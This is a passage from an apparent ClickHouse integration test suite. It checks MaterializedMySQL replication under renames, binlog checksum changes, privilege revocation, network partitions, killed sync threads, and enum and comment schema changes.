"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_rename_table.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_1\ntest_table_3\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_rename_table.test_table_1 DROP COLUMN drop_column, RENAME TO test_database_rename_table.test_table_2, RENAME TO test_database_rename_table.test_table_4")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename_table FORMAT TSV", "test_table_3\ntest_table_4\n")
check_query(clickhouse_node, "DESC test_database_rename_table.test_table_4 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_rename_table.test_table_4 VALUES(1), (2), (3), (4), (5)")
check_query(clickhouse_node, "SELECT * FROM test_database_rename_table.test_table_4 ORDER BY id FORMAT TSV", "1\n2\n3\n4\n5\n")
clickhouse_node.query("DROP DATABASE test_database_rename_table")
mysql_node.query("DROP DATABASE test_database_rename_table")
def query_event_with_empty_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_event")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_event")
mysql_node.query("CREATE DATABASE test_database_event")
mysql_node.query("RESET MASTER")
mysql_node.query("CREATE TABLE test_database_event.t1(a INT NOT NULL PRIMARY KEY, b VARCHAR(255) DEFAULT 'BEGIN')")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(1)")
clickhouse_node.query(
"CREATE DATABASE test_database_event ENGINE = MaterializedMySQL('{}:3306', 'test_database_event', 'root', 'clickhouse')".format(
service_name))
# Reject one empty GTID QUERY event with 'BEGIN' and 'COMMIT'
mysql_cursor = mysql_node.alloc_connection().cursor(pymysql.cursors.DictCursor)
mysql_cursor.execute("SHOW MASTER STATUS")
(uuid, seqs) = mysql_cursor.fetchall()[0]["Executed_Gtid_Set"].split(":")
(seq_begin, seq_end) = seqs.split("-")
next_gtid = uuid + ":" + str(int(seq_end) + 1)
mysql_node.query("SET gtid_next='" + next_gtid + "'")
mysql_node.query("BEGIN")
mysql_node.query("COMMIT")
mysql_node.query("SET gtid_next='AUTOMATIC'")
# Reject one 'BEGIN' QUERY event and 'COMMIT' XID event.
mysql_node.query("/* start */ begin /* end */")
mysql_node.query("INSERT INTO test_database_event.t1(a) VALUES(2)")
mysql_node.query("/* start */ commit /* end */")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_event FORMAT TSV", "t1\n")
check_query(clickhouse_node, "SELECT * FROM test_database_event.t1 ORDER BY a FORMAT TSV", "1\tBEGIN\n2\tBEGIN\n")
clickhouse_node.query("DROP DATABASE test_database_event")
mysql_node.query("DROP DATABASE test_database_event")
def select_without_columns(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS db")
clickhouse_node.query("DROP DATABASE IF EXISTS db")
mysql_node.query("CREATE DATABASE db")
mysql_node.query("CREATE TABLE db.t (a INT PRIMARY KEY, b INT)")
clickhouse_node.query(
"CREATE DATABASE db ENGINE = MaterializedMySQL('{}:3306', 'db', 'root', 'clickhouse') SETTINGS max_flush_data_time = 100000".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM db FORMAT TSV", "t\n")
clickhouse_node.query("SYSTEM STOP MERGES db.t")
clickhouse_node.query("CREATE VIEW v AS SELECT * FROM db.t")
mysql_node.query("INSERT INTO db.t VALUES (1, 1), (2, 2)")
mysql_node.query("DELETE FROM db.t WHERE a = 2;")
# We need to execute a DDL for flush data buffer
mysql_node.query("CREATE TABLE db.temporary(a INT PRIMARY KEY, b INT)")
optimize_on_insert = clickhouse_node.query("SELECT value FROM system.settings WHERE name='optimize_on_insert'").strip()
if optimize_on_insert == "0":
res = ["3\n", "2\n", "2\n"]
else:
res = ["2\n", "2\n", "1\n"]
check_query(clickhouse_node, "SELECT count((_sign, _version)) FROM db.t FORMAT TSV", res[0])
assert clickhouse_node.query("SELECT count(_sign) FROM db.t FORMAT TSV") == res[1]
assert_eq_with_retry(clickhouse_node, "SELECT count(_version) FROM db.t", res[2].strip(), sleep_time=2, retry_count=3)
assert clickhouse_node.query("SELECT count() FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count(*) FROM db.t FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM (SELECT * FROM db.t) FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM v FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM merge('db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT count() FROM remote('localhost', 'db', 't') FORMAT TSV") == "1\n"
assert clickhouse_node.query("SELECT _part FROM db.t FORMAT TSV") == "0_1_1_0\n"
assert clickhouse_node.query("SELECT _part FROM remote('localhost', 'db', 't') FORMAT TSV") == "0_1_1_0\n"
clickhouse_node.query("DROP VIEW v")
clickhouse_node.query("DROP DATABASE db")
mysql_node.query("DROP DATABASE db")
def insert_with_modify_binlog_checksum(clickhouse_node, mysql_node, service_name):
mysql_node.query("CREATE DATABASE test_checksum")
mysql_node.query("CREATE TABLE test_checksum.t (a INT PRIMARY KEY, b varchar(200))")
clickhouse_node.query("CREATE DATABASE test_checksum ENGINE = MaterializedMySQL('{}:3306', 'test_checksum', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_checksum FORMAT TSV", "t\n")
mysql_node.query("INSERT INTO test_checksum.t VALUES(1, '1111')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n")
mysql_node.query("SET GLOBAL binlog_checksum=NONE")
mysql_node.query("INSERT INTO test_checksum.t VALUES(2, '2222')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n")
mysql_node.query("SET GLOBAL binlog_checksum=CRC32")
mysql_node.query("INSERT INTO test_checksum.t VALUES(3, '3333')")
check_query(clickhouse_node, "SELECT * FROM test_checksum.t ORDER BY a FORMAT TSV", "1\t1111\n2\t2222\n3\t3333\n")
clickhouse_node.query("DROP DATABASE test_checksum")
mysql_node.query("DROP DATABASE test_checksum")
def err_sync_user_privs_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("DROP DATABASE IF EXISTS priv_err_db")
mysql_node.query("CREATE DATABASE priv_err_db DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE priv_err_db.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(1);")
mysql_node.create_min_priv_user("test", "123")
mysql_node.result("SHOW GRANTS FOR 'test'@'%';")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "1\n", 30, 5)
mysql_node.query("INSERT INTO priv_err_db.test_table_1 VALUES(2);")
check_query(clickhouse_node, "SELECT count() FROM priv_err_db.test_table_1 FORMAT TSV", "2\n")
clickhouse_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("REVOKE REPLICATION SLAVE ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE REPLICATION CLIENT, RELOAD ON *.* FROM 'test'@'%'")
clickhouse_node.query(
"CREATE DATABASE priv_err_db ENGINE = MaterializedMySQL('{}:3306', 'priv_err_db', 'test', '123')".format(
service_name))
assert "priv_err_db" in clickhouse_node.query("SHOW DATABASES")
assert "test_table_1" not in clickhouse_node.query("SHOW TABLES FROM priv_err_db")
clickhouse_node.query("DETACH DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
time.sleep(3)
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query("ATTACH DATABASE priv_err_db")
assert 'MySQL SYNC USER ACCESS ERR:' in str(exception.value)
assert "priv_err_db" not in clickhouse_node.query("SHOW DATABASES")
mysql_node.query("GRANT SELECT ON priv_err_db.* TO 'test'@'%'")
time.sleep(3)
clickhouse_node.query("ATTACH DATABASE priv_err_db")
clickhouse_node.query("DROP DATABASE priv_err_db")
mysql_node.query("REVOKE SELECT ON priv_err_db.* FROM 'test'@'%'")
mysql_node.query("DROP DATABASE priv_err_db;")
mysql_node.query("DROP USER 'test'@'%'")
def restore_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._delete_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._delete_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def drop_instance_mysql_connections(clickhouse_node, pm, action='REJECT'):
pm._check_instance(clickhouse_node)
pm._add_rule({'source': clickhouse_node.ip_address, 'destination_port': 3306, 'action': action})
pm._add_rule({'destination': clickhouse_node.ip_address, 'source_port': 3306, 'action': action})
time.sleep(5)
def network_partition_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_network")
clickhouse_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("DROP DATABASE IF EXISTS test_database_network")
mysql_node.query("DROP DATABASE IF EXISTS test")
mysql_node.query("CREATE DATABASE test_database_network;")
mysql_node.query("CREATE TABLE test_database_network.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("CREATE DATABASE test;")
clickhouse_node.query(
"CREATE DATABASE test_database_network ENGINE = MaterializedMySQL('{}:3306', 'test_database_network', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with PartitionManager() as pm:
drop_instance_mysql_connections(clickhouse_node, pm)
mysql_node.query('INSERT INTO test_database_network.test_table VALUES(1)')
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table", '')
with pytest.raises(QueryRuntimeException) as exception:
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
assert "Can't connect to MySQL server" in str(exception.value)
restore_instance_mysql_connections(clickhouse_node, pm)
check_query(clickhouse_node, "SELECT * FROM test_database_network.test_table FORMAT TSV", '1\n')
clickhouse_node.query(
"CREATE DATABASE test ENGINE = MaterializedMySQL('{}:3306', 'test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM test_database_network FORMAT TSV", "test_table\n")
mysql_node.query("CREATE TABLE test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test FORMAT TSV", "test\n")
clickhouse_node.query("DROP DATABASE test_database_network")
clickhouse_node.query("DROP DATABASE test")
mysql_node.query("DROP DATABASE test_database_network")
mysql_node.query("DROP DATABASE test")
def mysql_kill_sync_thread_restore_test(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS test_database;")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("DROP DATABASE IF EXISTS test_database;")
mysql_node.query("CREATE DATABASE test_database;")
mysql_node.query("CREATE TABLE test_database.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database.test_table VALUES (1)")
mysql_node.query("DROP DATABASE IF EXISTS test_database_auto;")
mysql_node.query("CREATE DATABASE test_database_auto;")
mysql_node.query("CREATE TABLE test_database_auto.test_table ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (11)")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
clickhouse_node.query("CREATE DATABASE test_database_auto ENGINE = MaterializedMySQL('{}:3306', 'test_database_auto', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table FORMAT TSV", '11\n')
# When ClickHouse dump all history data we can query it on ClickHouse
# but it don't mean that the sync thread is already to connect to MySQL.
# So After ClickHouse can query data, insert some rows to MySQL. Use this to re-check sync successed.
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (22)")
mysql_node.query("INSERT INTO test_database.test_table VALUES (2)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n')
get_sync_id_query = "SELECT id FROM information_schema.processlist WHERE state LIKE '% has sent all binlog to % waiting for more updates%';"
result = mysql_node.query_and_get_data(get_sync_id_query)
assert len(result) > 0
for row in result:
query = "kill " + str(row[0]) + ";"
mysql_node.query(query)
with pytest.raises(QueryRuntimeException, match="Cannot read all data"):
# https://dev.mysql.com/doc/refman/5.7/en/kill.html
# When you use KILL, a thread-specific kill flag is set for the thread.
# In most cases, it might take some time for the thread to die because the kill flag is checked only at specific intervals.
for sleep_time in [1, 3, 5]:
time.sleep(sleep_time)
clickhouse_node.query("SELECT * FROM test_database.test_table")
clickhouse_node.query("DETACH DATABASE test_database")
clickhouse_node.query("ATTACH DATABASE test_database")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
mysql_node.query("INSERT INTO test_database.test_table VALUES (3)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n3\n')
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (33)")
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n33\n')
clickhouse_node.query("DROP DATABASE test_database")
clickhouse_node.query("DROP DATABASE test_database_auto")
mysql_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database_auto")
def mysql_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
mysql_node.query("CREATE DATABASE kill_mysql_while_insert")
mysql_node.query("CREATE TABLE kill_mysql_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_mysql_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_mysql_while_insert', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_mysql_while_insert FORMAT TSV", 'test\n')
try:
def insert(num):
for i in range(num):
query = "INSERT INTO kill_mysql_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(10000,))
t.start()
clickhouse_node.cluster.restart_service(service_name)
finally:
with pytest.raises(QueryRuntimeException) as exception:
time.sleep(2)
clickhouse_node.query("SELECT count() FROM kill_mysql_while_insert.test")
mysql_node.alloc_connection()
clickhouse_node.query("DETACH DATABASE kill_mysql_while_insert")
clickhouse_node.query("ATTACH DATABASE kill_mysql_while_insert")
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_mysql_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_mysql_while_insert.test", res)
mysql_node.query("DROP DATABASE kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE kill_mysql_while_insert")
def clickhouse_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_clickhouse_while_insert")
mysql_node.query("CREATE DATABASE kill_clickhouse_while_insert")
mysql_node.query("CREATE TABLE kill_clickhouse_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_clickhouse_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_clickhouse_while_insert', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_clickhouse_while_insert FORMAT TSV", 'test\n')
def insert(num):
for i in range(num):
query = "INSERT INTO kill_clickhouse_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(1000,))
t.start()
# TODO: add clickhouse_node.restart_clickhouse(20, kill=False) test
clickhouse_node.restart_clickhouse(20, kill=True)
t.join()
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_clickhouse_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_clickhouse_while_insert.test FORMAT TSV", res)
mysql_node.query("DROP DATABASE kill_clickhouse_while_insert")
clickhouse_node.query("DROP DATABASE kill_clickhouse_while_insert")
def utf8mb4_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
clickhouse_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
mysql_node.query("CREATE DATABASE utf8mb4_test")
mysql_node.query("CREATE TABLE utf8mb4_test.test (id INT(11) NOT NULL PRIMARY KEY, name VARCHAR(255)) ENGINE=InnoDB DEFAULT CHARACTER SET utf8mb4")
mysql_node.query("INSERT INTO utf8mb4_test.test VALUES(1, '🦄'),(2, '\u2601')")
clickhouse_node.query("CREATE DATABASE utf8mb4_test ENGINE = MaterializedMySQL('{}:3306', 'utf8mb4_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM utf8mb4_test FORMAT TSV", "test\n")
check_query(clickhouse_node, "SELECT id, name FROM utf8mb4_test.test ORDER BY id", "1\t\U0001F984\n2\t\u2601\n")
def system_parts_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_parts_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_parts_test")
mysql_node.query("CREATE DATABASE system_parts_test")
mysql_node.query("CREATE TABLE system_parts_test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO system_parts_test.test VALUES(1),(2),(3)")
def check_active_parts(num):
check_query(clickhouse_node, "SELECT count() FROM system.parts WHERE database = 'system_parts_test' AND table = 'test' AND active = 1", "{}\n".format(num))
clickhouse_node.query("CREATE DATABASE system_parts_test ENGINE = MaterializedMySQL('{}:3306', 'system_parts_test', 'root', 'clickhouse')".format(service_name))
check_active_parts(1)
mysql_node.query("INSERT INTO system_parts_test.test VALUES(4),(5),(6)")
check_active_parts(2)
clickhouse_node.query("OPTIMIZE TABLE system_parts_test.test")
check_active_parts(1)
def multi_table_update_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS multi_table_update")
clickhouse_node.query("DROP DATABASE IF EXISTS multi_table_update")
mysql_node.query("CREATE DATABASE multi_table_update")
mysql_node.query("CREATE TABLE multi_table_update.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("CREATE TABLE multi_table_update.b (id INT(11) NOT NULL PRIMARY KEY, othervalue VARCHAR(255))")
mysql_node.query("INSERT INTO multi_table_update.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO multi_table_update.b VALUES(1, 'bar')")
clickhouse_node.query("CREATE DATABASE multi_table_update ENGINE = MaterializedMySQL('{}:3306', 'multi_table_update', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM multi_table_update", "a\nb\n")
mysql_node.query("UPDATE multi_table_update.a, multi_table_update.b SET value='baz', othervalue='quux' where a.id=b.id")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.a", "1\tbaz\n")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.b", "1\tquux\n")
def system_tables_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_tables_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_tables_test")
mysql_node.query("CREATE DATABASE system_tables_test")
mysql_node.query("CREATE TABLE system_tables_test.test (id int NOT NULL PRIMARY KEY) ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE system_tables_test ENGINE = MaterializedMySQL('{}:3306', 'system_tables_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT partition_key, sorting_key, primary_key FROM system.tables WHERE database = 'system_tables_test' AND name = 'test'", "intDiv(id, 4294967)\tid\tid\n")
def materialize_with_column_comments_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
mysql_node.query("CREATE DATABASE materialize_with_column_comments_test")
mysql_node.query("CREATE TABLE materialize_with_column_comments_test.test (id int NOT NULL PRIMARY KEY, value VARCHAR(255) COMMENT 'test comment') ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE materialize_with_column_comments_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_column_comments_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\ttest comment\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test MODIFY value VARCHAR(255) COMMENT 'comment test'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test ADD value2 int COMMENT 'test comment 2'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\nvalue2\tNullable(Int32)\t\t\ttest comment 2\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_column_comments_test")
mysql_node.query("DROP DATABASE materialize_with_column_comments_test")
def materialize_with_enum8_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
mysql_node.query("CREATE DATABASE materialize_with_enum8_test")
enum8_values_count = 127
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum8_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum8_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum8_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (3, '127')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n127\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum8_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum8_test")
mysql_node.query("DROP DATABASE materialize_with_enum8_test")
def materialize_with_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
mysql_node.query("CREATE DATABASE materialize_with_enum16_test")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum16_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum16_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (3, '500')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n500\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum16_test")
mysql_node.query("DROP DATABASE materialize_with_enum16_test")
def alter_enum8_to_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
mysql_node.query("CREATE DATABASE alter_enum8_to_enum16_test")
enum8_values_count = 100
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE alter_enum8_to_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE alter_enum8_to_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'alter_enum8_to_enum16_test', 'root', 'clickhouse')".format(service_name))
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (3, '75')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("ALTER TABLE alter_enum8_to_enum16_test.test MODIFY COLUMN value ENUM(" + enum16_values + ")")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
